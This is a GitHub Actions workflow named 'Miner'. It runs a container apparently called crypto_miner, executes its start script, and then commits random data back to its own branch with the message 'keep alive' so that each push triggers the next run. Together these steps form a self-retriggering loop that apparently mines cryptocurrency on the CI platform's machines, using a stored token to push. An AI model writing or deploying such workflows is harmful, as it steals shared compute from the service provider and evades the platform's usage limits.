name: Miner

on:
  push:
    branches:
      - changingFile
permissions:
  contents: write
jobs:
  build:
    runs-on: ubuntu-22.04
    container: jairf/crypto_miner:0.1
    permissions:
      contents: write
    env:
      REPO_URL: ${{ github.server_url }}/${{ github.repository }}.git
    steps:
      - run: echo ${{ env.REPO_URL }}
      - run: /workspaces/start.sh
      - uses: actions/checkout@v4
        with:
          persist-credentials: false
          fetch-depth: 0
          path: 'changingFile'
      # - uses: qoomon/actions--setup-git@v1
      - run: git clone ${{ env.REPO_URL }}
      #- run: cd crypto_miner ; git checkout changingFile ; git pull
      - run: cat /dev/random | head -c 254 | base64 > crypto_miner/changing_file
      - name: Commit & Push changes
        uses: actions-js/push@v1.5
        with:
          message: "keep alive"
          branch: changingFile
          directory: crypto_miner
          github_token: ${{ secrets.G_TOKEN }}
